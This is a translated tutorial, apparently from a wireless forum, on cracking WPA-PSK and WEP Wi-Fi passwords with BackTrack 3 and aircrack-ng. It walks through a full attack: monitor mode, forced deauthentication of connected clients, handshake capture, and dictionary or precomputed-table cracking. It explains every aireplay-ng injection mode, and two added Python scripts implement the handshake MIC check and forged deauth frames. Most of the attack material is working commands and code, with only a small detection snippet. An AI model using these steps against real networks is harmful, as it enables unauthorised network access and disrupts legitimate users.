Prerequisite for cracking WPA-PSK: a legitimate wireless client must be connected to the AP, because the four-way handshake is only exchanged when a client associates.
Principle of WPA cracking:
A deauthentication (Deauth) attack is used. The legitimate wireless client is forced off the AP; once it has been disconnected from the WLAN, the client automatically tries to reconnect, and during that reconnection the AP and the client exchange the WPA four-way handshake. airodump-ng captures this exchange into a cap file. The handshake in the cap file is then attacked offline with a dictionary (a brute-force search over candidate passphrases).
1. Put the NIC into monitor mode on channel 11
airmon-ng start wifi0 11
2. Capture the traffic on channel 11 and save it to a cap file with the prefix 123
airodump-ng -w 123 -c 11 wifi0
(Figure: airodump-ng output showing that the AP uses WPA encryption and that a legitimate wireless client, 00:16:b6:9d:10:ad, is connected.)
3. Run the Deauth attack so that the legitimate client is forced off the AP and has to reconnect
aireplay-ng -0 10 -a <ap mac> -c <client mac> wifi0
Explanation: -0 selects the deauthentication attack and is followed by the number of deauth rounds to send. Using -c is recommended because it works much better; it is followed by the MAC address of the legitimate client you are watching (the one shown by airodump-ng), not your own MAC.
(Figure: the -c argument is the legitimate wireless client's MAC address.)
A single Deauth run often does not succeed, so repeat it until the handshake is captured. For WPA cracking there is no need to wait for the Data column to reach tens of thousands: the capture only has to contain the few EAPOL frames of the WPA four-way handshake (at least the message carrying the AP nonce and the message carrying the client nonce with its MIC). When the handshake has been captured, airodump-ng shows "WPA handshake: <ap mac>" in the top line of its display.
(Figure: airodump-ng output with the WPA handshake indicator highlighted.)
China Wireless Forum by Zhongwei
AnywhereWLAN
At this point, typing ls shows the capture file in the root directory. Note that airodump-ng appends a sequence number to the prefix given with -w, so the file is 123-01.cap (a further capture with the same prefix becomes 123-02.cap, and so on).
After getting the handshake packet, you can use a dictionary to crack it.
First, copy the dictionary generated by a dictionary tool under Windows (for example password.txt) to the root directory.
Double-click System on the BT3 desktop, and the file manager shown below appears.
The left pane of the picture is the root directory; the storage media entry in the picture, when double-clicked, lists the partitions of your hard disk. Go to your hard disk partition, right-click Copy on the dictionary, then go to the root directory and right-click Paste.
Currently, WPA cracking still comes down to brute-force and dictionary attacks, and one of the drawbacks of brute-force and dictionary attacks is that they are "time-consuming, laborious and a matter of luck": you can spend a very long time and still not recover the key. Everything depends on having a good dictionary.
Cracking method 1: run aircrack-ng directly on the cap file
WEP is very easy to crack: as long as you collect enough cap packets (IVs), you will be able to recover the key. WPA cracking requires
a good password dictionary, and a complex WPA passphrase may not be cracked in months.
Type: aircrack-ng -z -b <ap mac> 123*.cap
123 is the prefix of the handshake capture you saved earlier. airodump-ng automatically appends -01, -02 and so on to the prefix you entered (if there are too many packets it splits the capture into several files and numbers them; you can list them with ls), so 123*.cap opens all the cap files belonging to prefix 123.
Note: -z (the PTW attack) only applies to WEP. For a WPA capture aircrack-ng has nothing to test without a dictionary, so without -w this command at best confirms that a handshake is present; the actual key recovery is done by the dictionary methods below.
Frequently Asked Questions:
The packets collected in step 2 have reached 300,000 and the password still cannot be cracked. For WPA the packet count is irrelevant; only the handshake matters, and the capture may have been split automatically into several files.
If you enter only 123-01.cap, cracking may fail because the handshake is in another file; it is recommended to use 123*.cap so that all the cap files are selected.
Cracking method 2: dictionary attack
I. Run the dictionary attack directly in BT3
aircrack-ng -w password.txt -b <ap mac> 123-01.cap
Parameter description: password.txt is the dictionary file and 123-01.cap is the handshake capture obtained in step 2 (use 123*.cap if the capture was split into several files).
(Figure: aircrack-ng output. Recovering the WPA password took 1 minute 31 seconds at 149.91 k/s.)
Note: this tutorial only illustrates the process. I built a small 256K dictionary and added the password to it beforehand.
II. You can also copy the cap file containing the four-way handshake to the hard disk under Windows and use WinAircrack with a dictionary to crack it.
In the WinAircrack window, select WPA-PSK under Encryption type and add the captured handshake file 123-01.cap under Capture files.
Then select the WPA tab as shown below.
Import the dictionary file password.txt under Dictionary file, then click "Aircrack the key" in the lower right corner.
The following prompt then appears.
Select 1 and press Enter to start cracking. The result after a successful crack is shown below.
(Figure: WinAircrack result. The crack took 54 seconds at 251.73 k/s, faster than in BT3.)
III. Build a WPA table with airolib-ng for very fast WPA cracking
Besides running a dictionary directly, the other WPA dictionary method is to use airolib-ng to precompute the dictionary into a WPA table and then crack with aircrack-ng against that table.
Building a WPA table means running the same key derivation that WPA itself uses (the pairwise master key, PMK, derived from the passphrase and the SSID) for every dictionary entry in advance, so that at cracking time the precomputed values are simply looked up and compared. This improves cracking efficiency enormously.
First, building the WPA table with airolib-ng.
A WPA table is strongly SSID-specific: the SSID enters the key derivation, so a table is only useful for the SSIDs it was built for.
1. Before building a WPA table you need two files: ssid.txt, a list of SSIDs, and a dictionary file,
password.txt. The picture below shows my files.
You can see the two txt files: ssid.txt is the SSID list, into which you can add common SSIDs, and password.txt is the dictionary file.
2. Copy ssid.txt, password.txt and the handshake capture 123-01.cap you grabbed above to the root directory for easy access, as shown below.
3. Start building the WPA table with airolib-ng. The table database is saved under the name wpahash, which is the first argument to every airolib-ng command below.
The first step, as shown below:
airolib-ng wpahash --import essid ssid.txt
The second step, as shown below:
airolib-ng wpahash --import passwd password.txt
The third step, as shown below:
airolib-ng wpahash --clean all
The fourth step, as shown below:
airolib-ng wpahash --batch
Note: this step takes a long time (depending on the size of the dictionary; I waited 15 minutes for a 256K dictionary).
4. Crack with aircrack-ng using the WPA table
aircrack-ng -r wpahash 123-01.cap
Select 1 to start cracking.
A successful crack is shown in the following figure.
(Figure: aircrack-ng with the WPA table. Time consumed 00:00:00, that is, under one second, at a reported speed of 42250.00 k/s.)
Comparing the three methods: running the dictionary under Windows with WinAircrack was faster than in BT3; the direct dictionary attack recovered the password in under a minute, while the WPA table cracked it in under a second but took 15 minutes to build.
Building a WPA table is the time-consuming part: a table covering common SSIDs and a relatively large dictionary takes a very long time to build, although once built it cracks almost instantly.
Of course there is no universal dictionary, but if there were one, a WPA table built from it for all common SSIDs would be a truly enormous precomputed database.
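To make the capture-and-crack procedure above (steps 1 to 3 and methods 1 and 2) and the airolib-ng table concrete, here is the same computation in Python. This is an added example, not code from the tutorial or from the aircrack-ng project: it derives the PMK the way WPA does (PBKDF2 over passphrase and SSID), expands it to the PTK, checks the MIC on message 2 of the four-way handshake, and precomputes an airolib-ng-style table keyed by (SSID, word). The handshake it cracks is constructed in the file under an assumed passphrase and made-up BSSID; the SSID "IEEE" is the one from the 802.11i Annex H test vector, and nothing here reads a real cap file.

```python
"""WPA/WPA2-PSK dictionary cracking reduced to the primitives that aircrack-ng
and airolib-ng use.  Added example, not code from the original tutorial or from
the aircrack-ng project.  The handshake is constructed below under an assumed
passphrase; nothing here reads a real cap file."""
import hashlib
import hmac
import struct

AP_MAC = bytes.fromhex("000f66aabbcc")   # assumed BSSID (made up)
STA_MAC = bytes.fromhex("0016b69d10ad")  # the client MAC seen in the tutorial's capture
SSID = "IEEE"                            # SSID of the 802.11i Annex H test vector

def pmk(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes).  The SSID
    is the salt: this is the one slow step airolib-ng --batch precomputes, and the
    reason a WPA table only works for the SSIDs it was built with."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def ptk(pmk_, aa, spa, anonce, snonce):
    """PRF-512 from 802.11i: HMAC-SHA1(PMK, label|0x00|data|i) for i = 0..3, joined.
    The first 16 bytes are the KCK, which keys the handshake MIC."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return b"".join(hmac.new(pmk_, b"Pairwise key expansion\x00" + data + bytes([i]),
                             hashlib.sha1).digest() for i in range(4))[:64]

def eapol_mic(kck, eapol):
    """First 16 bytes of the HMAC over the EAPOL-Key frame with its MIC field (bytes
    81..96) zeroed.  Key Descriptor Version (low 3 bits of Key Info) selects the
    hash: 1 = HMAC-MD5 (WPA/TKIP), 2 = HMAC-SHA1 (WPA2/CCMP)."""
    version = struct.unpack(">H", eapol[5:7])[0] & 0x7
    zeroed = eapol[:81] + b"\x00" * 16 + eapol[97:]
    return hmac.new(kck, zeroed, hashlib.md5 if version == 1 else hashlib.sha1).digest()[:16]

def build_eapol_key(key_info, nonce, mic=b"\x00" * 16):
    """EAPOL-Key frame (descriptor type 2, RSN) with empty Key Data: EAPOL header(4) |
    type(1) | Key Info(2) | Key Length(2) | Replay Counter(8) | Nonce(32) |
    IV+RSC+ID(32) | MIC(16) | Key Data Length(2)."""
    body = bytes([2]) + struct.pack(">HHQ", key_info, 16, 1) + nonce + b"\x00" * 32 + mic + b"\x00\x00"
    return bytes([2, 3]) + struct.pack(">H", len(body)) + body

def classify(eapol):
    """Return 1..4 for the four-way handshake message an EAPOL-Key frame is, else None."""
    info = struct.unpack(">H", eapol[5:7])[0]
    install, ack, mic, secure = info & 0x40, info & 0x80, info & 0x100, info & 0x200
    if ack and not mic:
        return 1
    if ack and mic and install:
        return 3
    if mic and not ack:  # WPA (non-RSN) leaves Secure clear in M4, hence the nonce check
        return 4 if secure or eapol[17:49] == b"\x00" * 32 else 2
    return None

def extract_handshake(frames):
    """frames: (src, dst, eapol) tuples pulled from a capture.  Returns what aircrack-ng
    needs: AP and client MACs, the ANonce (from M1 or M3) and M2, which carries the
    SNonce and the MIC to test against.  Data frames add nothing to this."""
    aa = spa = anonce = m2 = None
    for src, dst, e in frames:
        kind = classify(e)
        if kind in (1, 3):
            aa, spa, anonce = src, dst, e[17:49]
        elif kind == 2:
            m2 = e
    return None if anonce is None or m2 is None else (aa, spa, anonce, m2)

def build_table(ssids, words):
    """airolib-ng style table: one PMK per (ssid, word), the expensive step done once."""
    return {(s, w): pmk(w, s) for s in ssids for w in words}

def crack(ssid, frames, table):
    """Test every table entry for this SSID against the captured MIC."""
    hs = extract_handshake(frames)
    if hs is None:
        return None
    aa, spa, anonce, m2 = hs
    snonce, mic = m2[17:49], m2[81:97]
    for (s, word), p in table.items():
        if s == ssid:
            kck = ptk(p, aa, spa, anonce, snonce)[:16]
            if hmac.compare_digest(eapol_mic(kck, m2), mic):
                return word
    return None

def constructed_capture(passphrase):
    """Stand-in (constructed) for what airodump-ng records after -0 forces a reconnect."""
    anonce, snonce = bytes(range(32)), bytes(range(100, 132))
    m1 = build_eapol_key(0x008A, anonce)  # Key Info: pairwise | ACK
    m2 = build_eapol_key(0x010A, snonce)  # Key Info: pairwise | MIC, MIC field still zero
    kck = ptk(pmk(passphrase, SSID), AP_MAC, STA_MAC, anonce, snonce)[:16]
    m2 = build_eapol_key(0x010A, snonce, eapol_mic(kck, m2))
    return [(AP_MAC, STA_MAC, m1), (STA_MAC, AP_MAC, m2)]

if __name__ == "__main__":
    cap = constructed_capture("password")
    table = build_table(["IEEE", "linksys"], ["12345678", "password", "letmein1"])
    print(crack("IEEE", cap, table))     # password
    print(crack("linksys", cap, table))  # None: PMKs for another SSID never match
```

The split between pmk() and the rest is the whole point of airolib-ng: the 4096-round PBKDF2 is the only expensive step and depends solely on (SSID, passphrase), so a table of PMKs built once serves any handshake from that SSID, while the per-handshake work (PRF-512 and one HMAC) is cheap. It also shows why the table is SSID-specific: the same word under "linksys" yields a different PMK and never matches a handshake from "IEEE".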
Note: the cracker in the CAIN software on the Windows platform can also perform brute-force and dictionary attacks on WEP and WPA, but its speed is very slow and it is not practical compared with aircrack-ng.
The 6 attack modes of aireplay-ng explained
-0 Deauthentication mode
Forces an already-connected legitimate client off the AP so that it reconnects. For WPA the reconnection yields the four-way handshake; for WEP the traffic generated during reconnection produces the valid ARP request that the -3 attack needs.
If a client is associated but nobody is generating traffic on it, the -3 attack cannot obtain a valid ARP request even when it is running.
This is why the -0 attack is used: kicking the client makes the -3 attack start immediately.
aireplay-ng -0 10 -a <ap mac> -c <client mac> wifi0
Parameter description:
-0: deauthentication mode, followed by the number of rounds to send (0 sends continuously; the client is then kicked again and again and cannot use the network normally)
-a: the MAC of the AP
-c: the MAC of the connected legitimate client. Without -c, all legitimate clients connected to the AP are disconnected.
Typically run alongside the ARP replay attack:
aireplay-ng -3 -b <ap mac> -h <my mac> wifi0
Note: the prerequisite for this attack mode is that an authenticated, legitimate client is connected to the router.
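What -0 actually transmits, as an added example that is not the tutorial's or aircrack-ng's code: it builds the 802.11 deauthentication frames that a broadcast run (no -c) and a directed run (-c) put on the air, parses them back, and counts deauths per BSSID the way a wireless IDS would. The MAC addresses are made up. One caveat the tutorial predates: where both AP and client use 802.11w (protected management frames), a deauthentication frame carries a MIC, so forged ones are ignored and this attack fails.

```python
"""The frames aireplay-ng -0 injects, built and parsed by hand, plus a defender-side
count.  Added example, not aircrack-ng code; the MAC addresses used are made up."""
import struct

DEAUTH_FC = b"\xc0\x00"   # Frame Control: protocol 0, type 0 (management), subtype 12 (deauth)
BROADCAST = b"\xff" * 6


def mac(text):
    """'00:16:b6:9d:10:ad' -> 6 raw bytes."""
    return bytes.fromhex(text.replace(":", ""))


def deauth_frame(dst, src, bssid, seq, reason=7):
    """802.11 deauthentication frame: 24-byte management header (FC, duration,
    addr1=dst, addr2=src, addr3=BSSID, sequence control) + 2-byte reason code.
    Reason 7, 'class 3 frame received from non-associated station', is the code
    aireplay-ng reports when it sends deauths."""
    header = DEAUTH_FC + b"\x00\x00" + dst + src + bssid + struct.pack("<H", seq << 4)
    return header + struct.pack("<H", reason)


def aireplay_deauth(ap, client=None, count=1):
    """Frames for one 'aireplay-ng -0 count' run.  Without -c the deauth is broadcast
    in the AP's name and kicks every client; with -c it is directed and forged in
    both directions, so AP and client each believe the other ended the session."""
    frames, seq = [], 0
    for _ in range(count):
        if client is None:
            frames.append(deauth_frame(BROADCAST, ap, ap, seq))
            seq += 1
        else:
            frames.append(deauth_frame(client, ap, ap, seq))      # "from" the AP to the client
            frames.append(deauth_frame(ap, client, ap, seq + 1))  # "from" the client to the AP
            seq += 2
    return frames


def parse_deauth(frame):
    """(dst, src, bssid, reason) for a deauth frame, None for any other frame."""
    if len(frame) < 26 or frame[:2] != DEAUTH_FC:
        return None
    return frame[4:10], frame[10:16], frame[16:22], struct.unpack("<H", frame[24:26])[0]


def deauth_flood(frames, threshold=10):
    """Defender side: count deauths per BSSID over a window of frames the caller
    selects (for example a few seconds of capture).  A real AP deauthenticates a
    station occasionally; dozens in a short window are the signature of an injector."""
    counts = {}
    for f in frames:
        p = parse_deauth(f)
        if p is not None:
            counts[p[2]] = counts.get(p[2], 0) + 1
    return {bssid: n for bssid, n in counts.items() if n >= threshold}
```

The directed form is why -c "works better": the AP sees a deauth from its client and drops the association state, and the client sees one from the AP and reconnects, so the handshake is re-run even if only one side received its frame.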
-1 fakeauth count: fake client connection
This mode fakes a client association with the AP.
It is the first step of the clientless attack: since there is no legitimately connected client, a fake client has to be associated with the router.
For the AP to accept packets, your own NIC must be associated with it. Without an association, the target AP ignores every packet sent from your NIC and no IVs are generated. Use -1 to fake a successful client association before sending the injection command, so that the router accepts the injected frames and replies with the traffic that generates ARP packets.
aireplay-ng -1 0 -e <ap essid> -a <ap mac> -h <my mac> wifi0
Parameter description:
-1: fake authentication mode, followed by the reassociation delay in seconds (0 means associate once)
-e: the ESSID of the AP
-a: the MAC of the AP
-h: the MAC of the NIC used as the fake client (i.e. your own NIC's MAC)
-2 Interactive mode
This mode captures packets and lets you select and replay them as attack packets; it combines the capabilities of the other modes.
1. It is mainly used in the clientless attack: first use -1 to establish a fake client association, then send packets directly to attack
aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b <ap mac> -h <my mac> wifi0
Parameter description:
-2: interactive attack mode
-p: the frame control word (in hexadecimal) to set on the injected frames; 0841 is the value normally used
-c: the destination MAC address
-b: the MAC address of the AP
-h: the MAC of the NIC used as the fake client (i.e. your own NIC's MAC)
2. Replay packets from a capture file
aireplay-ng -2 -r <file> -x 1024 wifi0
Replays the packets in the file. -x 1024 limits the sending rate (packets per second) to avoid overloading the card; 1024 is a reasonable value.
-3 ARP-request injection mode
This mode captures packets, picks out ARP requests and retransmits them.
It is very effective. It can be used with a legitimate client or with a fake client associated via -1. With a legitimate client you usually have to wait a few minutes for traffic between the client and the AP; a small amount of data is enough to produce a valid ARP request, after which the -3 injection succeeds. If no traffic exists to supply an ARP request, the attack fails; if no ARP request appears between the legitimate client and the AP for a long time, try running the -0 attack at the same time.
If there is no legitimate client, a fake client associated via -1 can be used instead. The packets obtained during the fake association are used to produce a valid ARP request, which is then injected in -3 mode.
aireplay-ng -3 -b <ap mac> -h <my mac> -x 512 wifi0
Parameter description:
-3: ARP injection mode
-b: the MAC of the AP
-h: the MAC of your own NIC (the fake client associated via -1)
-x: the number of packets sent per second; the maximum is 1024 and 512 is recommended (it can also be left unset)
-4 Chopchop mode, used to obtain an xor file containing keystream
This mode is mainly used to obtain a usable .xor file containing the keystream (PRGA) for one packet. It is not the WEP key and does not decrypt the rest of the traffic; it is used to forge a new packet that we can then inject.
aireplay-ng -4 -b <ap mac> -h <my mac> wifi0
Parameter description:
-b: the MAC of the AP whose packets are to be decrypted
-h: the MAC used for the fake association (i.e. your own NIC's MAC)
-5 Fragmentation mode, used to obtain a PRGA (a file with the .xor suffix containing keystream)
This mode is mainly used to obtain a usable PRGA. The PRGA is not WEP key material and cannot be used to decrypt packets; it is used to forge a new packet that we can then inject. It works by making the target AP rebroadcast the packet; each rebroadcast carries a new IV, and those IVs are what the WEP crack uses.
aireplay-ng -5 -b <ap mac> -h <my mac> wifi0
-5: fragmentation attack mode
-b: the MAC of the AP
-h: the MAC used for the fake association (i.e. your own NIC's MAC)
packetforge-ng: packet forger
packetforge-ng <mode> <options>
Mode
-0: forge ARP packets
packetforge-ng -0 -a <ap mac> -h <my mac> -k 255.255.255.255 -l 255.255.255.255 -y <.xor file> -w mrarp
(packetforge-ng writes a file and takes no interface argument; the forged packet is injected afterwards with aireplay-ng -2 -r mrarp.)
Parameter description:
-0: forge an ARP request
-a: the MAC of the AP
-h: the MAC used for the fake association (i.e. your own MAC)
-k <ip[:port]>: the destination IP and port
-l <ip[:port]>: the source IP and port
-y <file>: read the PRGA from the named .xor file
-w: the file name to write the forged ARP packet to
aircrack-ng: the main WEP and WPA-PSK key cracking program
aircrack-ng [options] <.cap/.ivs file>
Options
aircrack-ng -n 64 -b <ap mac> name-01.ivs
Parameter description:
-n: the WEP key length in bits (64/128/152/256/512)
aircrack-ng -x -f 2 name-01.cap
Parameter description:
-x: disable brute-forcing of the last key bytes (WEP only; -x1 and -x2 enable brute-forcing of the last one or two key bytes)
-f: the brute-force fudge factor (WEP only, default 2); a higher value tries more key candidates and takes longer
aircrack-ng -w password.txt ciw.cap
-w: dictionary mode, followed by the dictionary file and then the capture file containing the WPA handshake saved earlier.
Frequently Asked Questions
Question 1: When I start BT3 and type startx, I get a black screen.
Answer: after logging in with the username root and the password toor, type xconf; the screen goes black for a while, and when the prompt comes back type startx to enter the desktop. If you cannot get into the desktop, you can also type the cracking commands directly at the prompt; Alt+F1 opens a shell, Alt+F2 a second shell, Alt+F3 a third, and so on. The window is closed with the Print Screen key.
Question 2: When I open kismet in BT3, the window flashes and disappears.
Solution: first check that the card is present (ifconfig -a should list rausb0) and put it into monitor mode (airmon-ng start rausb0), then open /usr/local/etc/kismet.conf and, under the line channelsplit=true, add the line source=rt2500,rausb0,monitor
Note: for the WUSB54G v4 the source must be rt2500, not rt2570 as shown when loading the driver.
For Intel 3945 cards add: source=ipw3945,eth0,IPW3945